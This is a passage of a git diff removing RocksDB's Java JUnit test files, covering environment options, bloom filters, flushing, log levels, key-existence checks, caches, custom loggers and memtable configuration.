-    try(final DirectSlice directSlice = new DirectSlice(buffer, 4)) {
-      assertThat(directSlice.toString()).isEqualTo("Some");
-    }
-  }
-
-  @Test(expected = IllegalArgumentException.class)
-  public void directSliceInitWithoutDirectAllocation() {
-    final byte[] data = "Some text".getBytes();
-    final ByteBuffer buffer = ByteBuffer.wrap(data);
-    try(final DirectSlice directSlice = new DirectSlice(buffer)) {
-      //no-op
-    }
-  }
-
-  @Test(expected = IllegalArgumentException.class)
-  public void directSlicePrefixInitWithoutDirectAllocation() {
-    final byte[] data = "Some text".getBytes();
-    final ByteBuffer buffer = ByteBuffer.wrap(data);
-    try(final DirectSlice directSlice = new DirectSlice(buffer, 4)) {
-      //no-op
-    }
-  }
-
-  @Test
-  public void directSliceClear() {
-    try(final DirectSlice directSlice = new DirectSlice("abc")) {
-      assertThat(directSlice.toString()).isEqualTo("abc");
-      directSlice.clear();
-      assertThat(directSlice.toString()).isEmpty();
-      directSlice.clear();  // make sure we don't double-free
-    }
-  }
-
-  @Test
-  public void directSliceRemovePrefix() {
-    try(final DirectSlice directSlice = new DirectSlice("abc")) {
-      assertThat(directSlice.toString()).isEqualTo("abc");
-      directSlice.removePrefix(1);
-      assertThat(directSlice.toString()).isEqualTo("bc");
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/EnvOptionsTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/EnvOptionsTest.java
deleted file mode 100644
index 9933b1e..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/EnvOptionsTest.java
+++ /dev/null
@@ -1,133 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Test;
-
-import java.util.Random;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class EnvOptionsTest {
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource = new RocksMemoryResource();
-
-  public static final Random rand = PlatformRandomHelper.getPlatformSpecificRandomFactory();
-
-  @Test
-  public void useMmapReads() {
-    try (final EnvOptions envOptions = new EnvOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      envOptions.setUseMmapReads(boolValue);
-      assertThat(envOptions.useMmapReads()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void useMmapWrites() {
-    try (final EnvOptions envOptions = new EnvOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      envOptions.setUseMmapWrites(boolValue);
-      assertThat(envOptions.useMmapWrites()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void useDirectReads() {
-    try (final EnvOptions envOptions = new EnvOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      envOptions.setUseDirectReads(boolValue);
-      assertThat(envOptions.useDirectReads()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void useDirectWrites() {
-    try (final EnvOptions envOptions = new EnvOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      envOptions.setUseDirectWrites(boolValue);
-      assertThat(envOptions.useDirectWrites()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void allowFallocate() {
-    try (final EnvOptions envOptions = new EnvOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      envOptions.setAllowFallocate(boolValue);
-      assertThat(envOptions.allowFallocate()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void setFdCloexecs() {
-    try (final EnvOptions envOptions = new EnvOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      envOptions.setSetFdCloexec(boolValue);
-      assertThat(envOptions.setFdCloexec()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void bytesPerSync() {
-    try (final EnvOptions envOptions = new EnvOptions()) {
-      final long longValue = rand.nextLong();
-      envOptions.setBytesPerSync(longValue);
-      assertThat(envOptions.bytesPerSync()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void fallocateWithKeepSize() {
-    try (final EnvOptions envOptions = new EnvOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      envOptions.setFallocateWithKeepSize(boolValue);
-      assertThat(envOptions.fallocateWithKeepSize()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void compactionReadaheadSize() {
-    try (final EnvOptions envOptions = new EnvOptions()) {
-      final int intValue = rand.nextInt();
-      envOptions.setCompactionReadaheadSize(intValue);
-      assertThat(envOptions.compactionReadaheadSize()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void randomAccessMaxBufferSize() {
-    try (final EnvOptions envOptions = new EnvOptions()) {
-      final int intValue = rand.nextInt();
-      envOptions.setRandomAccessMaxBufferSize(intValue);
-      assertThat(envOptions.randomAccessMaxBufferSize()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void writableFileMaxBufferSize() {
-    try (final EnvOptions envOptions = new EnvOptions()) {
-      final int intValue = rand.nextInt();
-      envOptions.setWritableFileMaxBufferSize(intValue);
-      assertThat(envOptions.writableFileMaxBufferSize()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void rateLimiter() {
-    try (final EnvOptions envOptions = new EnvOptions();
-      final RateLimiter rateLimiter1 = new RateLimiter(1000, 100 * 1000, 1)) {
-      envOptions.setRateLimiter(rateLimiter1);
-      assertThat(envOptions.rateLimiter()).isEqualTo(rateLimiter1);
-
-      try(final RateLimiter rateLimiter2 = new RateLimiter(1000)) {
-        envOptions.setRateLimiter(rateLimiter2);
-        assertThat(envOptions.rateLimiter()).isEqualTo(rateLimiter2);
-      }
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/FilterTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/FilterTest.java
deleted file mode 100644
index c610963..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/FilterTest.java
+++ /dev/null
@@ -1,39 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Test;
-
-public class FilterTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Test
-  public void filter() {
-    // new Bloom filter
-    final BlockBasedTableConfig blockConfig = new BlockBasedTableConfig();
-    try(final Options options = new Options()) {
-
-      try(final Filter bloomFilter = new BloomFilter()) {
-        blockConfig.setFilter(bloomFilter);
-        options.setTableFormatConfig(blockConfig);
-      }
-
-      try(final Filter bloomFilter = new BloomFilter(10)) {
-        blockConfig.setFilter(bloomFilter);
-        options.setTableFormatConfig(blockConfig);
-      }
-
-      try(final Filter bloomFilter = new BloomFilter(10, false)) {
-        blockConfig.setFilter(bloomFilter);
-        options.setTableFormatConfig(blockConfig);
-      }
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/FlushTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/FlushTest.java
deleted file mode 100644
index 46a5cdc..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/FlushTest.java
+++ /dev/null
@@ -1,49 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Rule;
-import org.junit.Test;
-import org.junit.rules.TemporaryFolder;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class FlushTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Rule
-  public TemporaryFolder dbFolder = new TemporaryFolder();
-
-  @Test
-  public void flush() throws RocksDBException {
-    try(final Options options = new Options()
-        .setCreateIfMissing(true)
-        .setMaxWriteBufferNumber(10)
-        .setMinWriteBufferNumberToMerge(10);
-        final WriteOptions wOpt = new WriteOptions()
-            .setDisableWAL(true);
-        final FlushOptions flushOptions = new FlushOptions()
-            .setWaitForFlush(true)) {
-      assertThat(flushOptions.waitForFlush()).isTrue();
-
-      try(final RocksDB db = RocksDB.open(options,
-          dbFolder.getRoot().getAbsolutePath())) {
-        db.put(wOpt, "key1".getBytes(), "value1".getBytes());
-        db.put(wOpt, "key2".getBytes(), "value2".getBytes());
-        db.put(wOpt, "key3".getBytes(), "value3".getBytes());
-        db.put(wOpt, "key4".getBytes(), "value4".getBytes());
-        assertThat(db.getProperty("rocksdb.num-entries-active-mem-table"))
-            .isEqualTo("4");
-        db.flush(flushOptions);
-        assertThat(db.getProperty("rocksdb.num-entries-active-mem-table"))
-            .isEqualTo("0");
-      }
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/InfoLogLevelTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/InfoLogLevelTest.java
deleted file mode 100644
index 48ecfa1..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/InfoLogLevelTest.java
+++ /dev/null
@@ -1,107 +0,0 @@
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Rule;
-import org.junit.Test;
-import org.junit.rules.TemporaryFolder;
-import org.rocksdb.util.Environment;
-
-import java.io.IOException;
-
-import static java.nio.file.Files.readAllBytes;
-import static java.nio.file.Paths.get;
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class InfoLogLevelTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Rule
-  public TemporaryFolder dbFolder = new TemporaryFolder();
-
-  @Test
-  public void testInfoLogLevel() throws RocksDBException,
-      IOException {
-    try (final RocksDB db =
-             RocksDB.open(dbFolder.getRoot().getAbsolutePath())) {
-      db.put("key".getBytes(), "value".getBytes());
-      assertThat(getLogContentsWithoutHeader()).isNotEmpty();
-    }
-  }
-
-  @Test
-  public void testFatalLogLevel() throws RocksDBException,
-      IOException {
-    try (final Options options = new Options().
-        setCreateIfMissing(true).
-        setInfoLogLevel(InfoLogLevel.FATAL_LEVEL);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath())) {
-      assertThat(options.infoLogLevel()).
-          isEqualTo(InfoLogLevel.FATAL_LEVEL);
-      db.put("key".getBytes(), "value".getBytes());
-      // As InfoLogLevel is set to FATAL_LEVEL, here we expect the log
-      // content to be empty.
-      assertThat(getLogContentsWithoutHeader()).isEmpty();
-    }
-  }
-
-  @Test
-  public void testFatalLogLevelWithDBOptions()
-      throws RocksDBException, IOException {
-    try (final DBOptions dbOptions = new DBOptions().
-        setInfoLogLevel(InfoLogLevel.FATAL_LEVEL);
-         final Options options = new Options(dbOptions,
-             new ColumnFamilyOptions()).
-             setCreateIfMissing(true);
-         final RocksDB db =
-             RocksDB.open(options, dbFolder.getRoot().getAbsolutePath())) {
-      assertThat(dbOptions.infoLogLevel()).
-          isEqualTo(InfoLogLevel.FATAL_LEVEL);
-      assertThat(options.infoLogLevel()).
-          isEqualTo(InfoLogLevel.FATAL_LEVEL);
-      db.put("key".getBytes(), "value".getBytes());
-      assertThat(getLogContentsWithoutHeader()).isEmpty();
-    }
-  }
-
-  @Test(expected = IllegalArgumentException.class)
-  public void failIfIllegalByteValueProvided() {
-    InfoLogLevel.getInfoLogLevel((byte) -1);
-  }
-
-  @Test
-  public void valueOf() {
-    assertThat(InfoLogLevel.valueOf("DEBUG_LEVEL")).
-        isEqualTo(InfoLogLevel.DEBUG_LEVEL);
-  }
-
-  /**
-   * Read LOG file contents into String.
-   *
-   * @return LOG file contents as String.
-   * @throws IOException if file is not found.
-   */
-  private String getLogContentsWithoutHeader() throws IOException {
-    final String separator = Environment.isWindows() ?
-        "\n" : System.getProperty("line.separator");
-    final String[] lines = new String(readAllBytes(get(
-        dbFolder.getRoot().getAbsolutePath() + "/LOG"))).split(separator);
-
-    int first_non_header = lines.length;
-    // Identify the last line of the header
-    for (int i = lines.length - 1; i >= 0; --i) {
-      if (lines[i].indexOf("Options.") >= 0 && lines[i].indexOf(':') >= 0) {
-        first_non_header = i + 1;
-        break;
-      }
-    }
-    StringBuilder builder = new StringBuilder();
-    for (int i = first_non_header; i < lines.length; ++i) {
-      builder.append(lines[i]).append(separator);
-    }
-    return builder.toString();
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/IngestExternalFileOptionsTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/IngestExternalFileOptionsTest.java
deleted file mode 100644
index 83e0dd1..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/IngestExternalFileOptionsTest.java
+++ /dev/null
@@ -1,87 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Test;
-
-import java.util.Random;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class IngestExternalFileOptionsTest {
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource
-      = new RocksMemoryResource();
-
-  public static final Random rand =
-      PlatformRandomHelper.getPlatformSpecificRandomFactory();
-
-  @Test
-  public void createExternalSstFileInfoWithoutParameters() {
-    try (final IngestExternalFileOptions options =
-        new IngestExternalFileOptions()) {
-      assertThat(options).isNotNull();
-    }
-  }
-
-  @Test
-  public void createExternalSstFileInfoWithParameters() {
-    final boolean moveFiles = rand.nextBoolean();
-    final boolean snapshotConsistency = rand.nextBoolean();
-    final boolean allowGlobalSeqNo = rand.nextBoolean();
-    final boolean allowBlockingFlush = rand.nextBoolean();
-    try (final IngestExternalFileOptions options =
-        new IngestExternalFileOptions(moveFiles, snapshotConsistency,
-        allowGlobalSeqNo, allowBlockingFlush)) {
-      assertThat(options).isNotNull();
-      assertThat(options.moveFiles()).isEqualTo(moveFiles);
-      assertThat(options.snapshotConsistency()).isEqualTo(snapshotConsistency);
-      assertThat(options.allowGlobalSeqNo()).isEqualTo(allowGlobalSeqNo);
-      assertThat(options.allowBlockingFlush()).isEqualTo(allowBlockingFlush);
-    }
-  }
-
-  @Test
-  public void moveFiles() {
-    try (final IngestExternalFileOptions options =
-        new IngestExternalFileOptions()) {
-      final boolean moveFiles = rand.nextBoolean();
-      options.setMoveFiles(moveFiles);
-      assertThat(options.moveFiles()).isEqualTo(moveFiles);
-    }
-  }
-
-  @Test
-  public void snapshotConsistency() {
-    try (final IngestExternalFileOptions options =
-        new IngestExternalFileOptions()) {
-      final boolean snapshotConsistency = rand.nextBoolean();
-      options.setSnapshotConsistency(snapshotConsistency);
-      assertThat(options.snapshotConsistency()).isEqualTo(snapshotConsistency);
-    }
-  }
-
-  @Test
-  public void allowGlobalSeqNo() {
-    try (final IngestExternalFileOptions options =
-        new IngestExternalFileOptions()) {
-      final boolean allowGlobalSeqNo = rand.nextBoolean();
-      options.setAllowGlobalSeqNo(allowGlobalSeqNo);
-      assertThat(options.allowGlobalSeqNo()).isEqualTo(allowGlobalSeqNo);
-    }
-  }
-
-  @Test
-  public void allowBlockingFlush() {
-    try (final IngestExternalFileOptions options =
-        new IngestExternalFileOptions()) {
-      final boolean allowBlockingFlush = rand.nextBoolean();
-      options.setAllowBlockingFlush(allowBlockingFlush);
-      assertThat(options.allowBlockingFlush()).isEqualTo(allowBlockingFlush);
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/KeyMayExistTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/KeyMayExistTest.java
deleted file mode 100644
index 8092270..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/KeyMayExistTest.java
+++ /dev/null
@@ -1,87 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Rule;
-import org.junit.Test;
-import org.junit.rules.TemporaryFolder;
-
-import java.util.ArrayList;
-import java.util.Arrays;
-import java.util.List;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class KeyMayExistTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Rule
-  public TemporaryFolder dbFolder = new TemporaryFolder();
-
-  @Test
-  public void keyMayExist() throws RocksDBException {
-    final List<ColumnFamilyDescriptor> cfDescriptors = Arrays.asList(
-        new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY),
-        new ColumnFamilyDescriptor("new_cf".getBytes())
-    );
-
-    final List<ColumnFamilyHandle> columnFamilyHandleList = new ArrayList<>();
-    try (final DBOptions options = new DBOptions()
-        .setCreateIfMissing(true)
-        .setCreateMissingColumnFamilies(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath(),
-             cfDescriptors, columnFamilyHandleList)) {
-      try {
-        assertThat(columnFamilyHandleList.size()).
-            isEqualTo(2);
-        db.put("key".getBytes(), "value".getBytes());
-        // Test without column family
-        StringBuilder retValue = new StringBuilder();
-        boolean exists = db.keyMayExist("key".getBytes(), retValue);
-        assertThat(exists).isTrue();
-        assertThat(retValue.toString()).isEqualTo("value");
-
-        // Test without column family but with readOptions
-        try (final ReadOptions readOptions = new ReadOptions()) {
-          retValue = new StringBuilder();
-          exists = db.keyMayExist(readOptions, "key".getBytes(), retValue);
-          assertThat(exists).isTrue();
-          assertThat(retValue.toString()).isEqualTo("value");
-        }
-
-        // Test with column family
-        retValue = new StringBuilder();
-        exists = db.keyMayExist(columnFamilyHandleList.get(0), "key".getBytes(),
-            retValue);
-        assertThat(exists).isTrue();
-        assertThat(retValue.toString()).isEqualTo("value");
-
-        // Test with column family and readOptions
-        try (final ReadOptions readOptions = new ReadOptions()) {
-          retValue = new StringBuilder();
-          exists = db.keyMayExist(readOptions,
-              columnFamilyHandleList.get(0), "key".getBytes(),
-              retValue);
-          assertThat(exists).isTrue();
-          assertThat(retValue.toString()).isEqualTo("value");
-        }
-
-        // KeyMayExist in CF1 must return false
-        assertThat(db.keyMayExist(columnFamilyHandleList.get(1),
-            "key".getBytes(), retValue)).isFalse();
-      } finally {
-        for (final ColumnFamilyHandle columnFamilyHandle :
-            columnFamilyHandleList) {
-          columnFamilyHandle.close();
-        }
-      }
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/LRUCacheTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/LRUCacheTest.java
deleted file mode 100644
index d2cd15b..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/LRUCacheTest.java
+++ /dev/null
@@ -1,27 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.Test;
-
-public class LRUCacheTest {
-
-  static {
-    RocksDB.loadLibrary();
-  }
-
-  @Test
-  public void newLRUCache() {
-    final long capacity = 1000;
-    final int numShardBits = 16;
-    final boolean strictCapacityLimit = true;
-    final double highPriPoolRatio = 5;
-    try(final Cache lruCache = new LRUCache(capacity,
-        numShardBits, strictCapacityLimit, highPriPoolRatio)) {
-      //no op
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/LoggerTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/LoggerTest.java
deleted file mode 100644
index f83cff3..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/LoggerTest.java
+++ /dev/null
@@ -1,238 +0,0 @@
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Rule;
-import org.junit.Test;
-import org.junit.rules.TemporaryFolder;
-
-import java.util.ArrayList;
-import java.util.Arrays;
-import java.util.List;
-import java.util.concurrent.atomic.AtomicInteger;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class LoggerTest {
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Rule
-  public TemporaryFolder dbFolder = new TemporaryFolder();
-
-  @Test
-  public void customLogger() throws RocksDBException {
-    final AtomicInteger logMessageCounter = new AtomicInteger();
-    try (final Options options = new Options().
-        setInfoLogLevel(InfoLogLevel.DEBUG_LEVEL).
-        setCreateIfMissing(true);
-         final Logger logger = new Logger(options) {
-           // Create new logger with max log level passed by options
-           @Override
-           protected void log(InfoLogLevel infoLogLevel, String logMsg) {
-             assertThat(logMsg).isNotNull();
-             assertThat(logMsg.length()).isGreaterThan(0);
-             logMessageCounter.incrementAndGet();
-           }
-         }
-    ) {
-      // Set custom logger to options
-      options.setLogger(logger);
-
-      try (final RocksDB db = RocksDB.open(options,
-          dbFolder.getRoot().getAbsolutePath())) {
-        // there should be more than zero received log messages in
-        // debug level.
-        assertThat(logMessageCounter.get()).isGreaterThan(0);
-      }
-    }
-  }
-
-  @Test
-  public void warnLogger() throws RocksDBException {
-    final AtomicInteger logMessageCounter = new AtomicInteger();
-    try (final Options options = new Options().
-        setInfoLogLevel(InfoLogLevel.WARN_LEVEL).
-        setCreateIfMissing(true);
-
-         final Logger logger = new Logger(options) {
-           // Create new logger with max log level passed by options
-           @Override
-           protected void log(InfoLogLevel infoLogLevel, String logMsg) {
-             assertThat(logMsg).isNotNull();
-             assertThat(logMsg.length()).isGreaterThan(0);
-             logMessageCounter.incrementAndGet();
-           }
-         }
-    ) {
-
-      // Set custom logger to options
-      options.setLogger(logger);
-
-      try (final RocksDB db = RocksDB.open(options,
-          dbFolder.getRoot().getAbsolutePath())) {
-        // there should be zero messages
-        // using warn level as log level.
-        assertThat(logMessageCounter.get()).isEqualTo(0);
-      }
-    }
-  }
-
-
-  @Test
-  public void fatalLogger() throws RocksDBException {
-    final AtomicInteger logMessageCounter = new AtomicInteger();
-    try (final Options options = new Options().
-        setInfoLogLevel(InfoLogLevel.FATAL_LEVEL).
-        setCreateIfMissing(true);
-
-         final Logger logger = new Logger(options) {
-           // Create new logger with max log level passed by options
-           @Override
-           protected void log(InfoLogLevel infoLogLevel, String logMsg) {
-             assertThat(logMsg).isNotNull();
-             assertThat(logMsg.length()).isGreaterThan(0);
-             logMessageCounter.incrementAndGet();
-           }
-         }
-    ) {
-
-      // Set custom logger to options
-      options.setLogger(logger);
-
-      try (final RocksDB db = RocksDB.open(options,
-          dbFolder.getRoot().getAbsolutePath())) {
-        // there should be zero messages
-        // using fatal level as log level.
-        assertThat(logMessageCounter.get()).isEqualTo(0);
-      }
-    }
-  }
-
-  @Test
-  public void dbOptionsLogger() throws RocksDBException {
-    final AtomicInteger logMessageCounter = new AtomicInteger();
-    try (final DBOptions options = new DBOptions().
-        setInfoLogLevel(InfoLogLevel.FATAL_LEVEL).
-        setCreateIfMissing(true);
-         final Logger logger = new Logger(options) {
-           // Create new logger with max log level passed by options
-           @Override
-           protected void log(InfoLogLevel infoLogLevel, String logMsg) {
-             assertThat(logMsg).isNotNull();
-             assertThat(logMsg.length()).isGreaterThan(0);
-             logMessageCounter.incrementAndGet();
-           }
-         }
-    ) {
-      // Set custom logger to options
-      options.setLogger(logger);
-
-      final List<ColumnFamilyDescriptor> cfDescriptors =
-          Arrays.asList(
-              new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY));
-      final List<ColumnFamilyHandle> cfHandles = new ArrayList<>();
-
-      try (final RocksDB db = RocksDB.open(options,
-          dbFolder.getRoot().getAbsolutePath(),
-          cfDescriptors, cfHandles)) {
-        try {
-          // there should be zero messages
-          // using fatal level as log level.
-          assertThat(logMessageCounter.get()).isEqualTo(0);
-        } finally {
-          for (final ColumnFamilyHandle columnFamilyHandle : cfHandles) {
-            columnFamilyHandle.close();
-          }
-        }
-      }
-    }
-  }
-
-  @Test
-  public void setWarnLogLevel() {
-    final AtomicInteger logMessageCounter = new AtomicInteger();
-    try (final Options options = new Options().
-        setInfoLogLevel(InfoLogLevel.FATAL_LEVEL).
-        setCreateIfMissing(true);
-         final Logger logger = new Logger(options) {
-           // Create new logger with max log level passed by options
-           @Override
-           protected void log(InfoLogLevel infoLogLevel, String logMsg) {
-             assertThat(logMsg).isNotNull();
-             assertThat(logMsg.length()).isGreaterThan(0);
-             logMessageCounter.incrementAndGet();
-           }
-         }
-    ) {
-      assertThat(logger.infoLogLevel()).
-          isEqualTo(InfoLogLevel.FATAL_LEVEL);
-      logger.setInfoLogLevel(InfoLogLevel.WARN_LEVEL);
-      assertThat(logger.infoLogLevel()).
-          isEqualTo(InfoLogLevel.WARN_LEVEL);
-    }
-  }
-
-  @Test
-  public void setInfoLogLevel() {
-    final AtomicInteger logMessageCounter = new AtomicInteger();
-    try (final Options options = new Options().
-        setInfoLogLevel(InfoLogLevel.FATAL_LEVEL).
-        setCreateIfMissing(true);
-         final Logger logger = new Logger(options) {
-           // Create new logger with max log level passed by options
-           @Override
-           protected void log(InfoLogLevel infoLogLevel, String logMsg) {
-             assertThat(logMsg).isNotNull();
-             assertThat(logMsg.length()).isGreaterThan(0);
-             logMessageCounter.incrementAndGet();
-           }
-         }
-    ) {
-      assertThat(logger.infoLogLevel()).
-          isEqualTo(InfoLogLevel.FATAL_LEVEL);
-      logger.setInfoLogLevel(InfoLogLevel.DEBUG_LEVEL);
-      assertThat(logger.infoLogLevel()).
-          isEqualTo(InfoLogLevel.DEBUG_LEVEL);
-    }
-  }
-
-  @Test
-  public void changeLogLevelAtRuntime() throws RocksDBException {
-    final AtomicInteger logMessageCounter = new AtomicInteger();
-    try (final Options options = new Options().
-        setInfoLogLevel(InfoLogLevel.FATAL_LEVEL).
-        setCreateIfMissing(true);
-
-         // Create new logger with max log level passed by options
-         final Logger logger = new Logger(options) {
-           @Override
-           protected void log(InfoLogLevel infoLogLevel, String logMsg) {
-             assertThat(logMsg).isNotNull();
-             assertThat(logMsg.length()).isGreaterThan(0);
-             logMessageCounter.incrementAndGet();
-           }
-         }
-    ) {
-      // Set custom logger to options
-      options.setLogger(logger);
-
-      try (final RocksDB db = RocksDB.open(options,
-          dbFolder.getRoot().getAbsolutePath())) {
-
-        // there should be zero messages
-        // using fatal level as log level.
-        assertThat(logMessageCounter.get()).isEqualTo(0);
-
-        // change log level to debug level
-        logger.setInfoLogLevel(InfoLogLevel.DEBUG_LEVEL);
-
-        db.put("key".getBytes(), "value".getBytes());
-        db.flush(new FlushOptions().setWaitForFlush(true));
-
-        // messages shall be received due to previous actions.
-        assertThat(logMessageCounter.get()).isNotEqualTo(0);
-      }
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/MemTableTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/MemTableTest.java
deleted file mode 100644
index 59503d4..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/MemTableTest.java
+++ /dev/null
@@ -1,111 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Test;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class MemTableTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Test
-  public void hashSkipListMemTable() throws RocksDBException {
-    try(final Options options = new Options()) {
-      // Test HashSkipListMemTableConfig
-      HashSkipListMemTableConfig memTableConfig =
-          new HashSkipListMemTableConfig();
-      assertThat(memTableConfig.bucketCount()).
-          isEqualTo(1000000);
-      memTableConfig.setBucketCount(2000000);
-      assertThat(memTableConfig.bucketCount()).
-          isEqualTo(2000000);
-      assertThat(memTableConfig.height()).
-          isEqualTo(4);
-      memTableConfig.setHeight(5);
-      assertThat(memTableConfig.height()).
-          isEqualTo(5);
-      assertThat(memTableConfig.branchingFactor()).
-          isEqualTo(4);
-      memTableConfig.setBranchingFactor(6);
-      assertThat(memTableConfig.branchingFactor()).
-          isEqualTo(6);
-      options.setMemTableConfig(memTableConfig);
-    }
-  }
-
-  @Test
-  public void skipListMemTable() throws RocksDBException {
-    try(final Options options = new Options()) {
-      SkipListMemTableConfig skipMemTableConfig =
-          new SkipListMemTableConfig();
-      assertThat(skipMemTableConfig.lookahead()).
-          isEqualTo(0);
-      skipMemTableConfig.setLookahead(20);
-      assertThat(skipMemTableConfig.lookahead()).
-          isEqualTo(20);
-      options.setMemTableConfig(skipMemTableConfig);
-    }
-  }
-
-  @Test
-  public void hashLinkedListMemTable() throws RocksDBException {
-    try(final Options options = new Options()) {
-      HashLinkedListMemTableConfig hashLinkedListMemTableConfig =
-          new HashLinkedListMemTableConfig();
-      assertThat(hashLinkedListMemTableConfig.bucketCount()).
-          isEqualTo(50000);
-      hashLinkedListMemTableConfig.setBucketCount(100000);
-      assertThat(hashLinkedListMemTableConfig.bucketCount()).
-          isEqualTo(100000);
-      assertThat(hashLinkedListMemTableConfig.hugePageTlbSize()).
-          isEqualTo(0);
-      hashLinkedListMemTableConfig.setHugePageTlbSize(1);
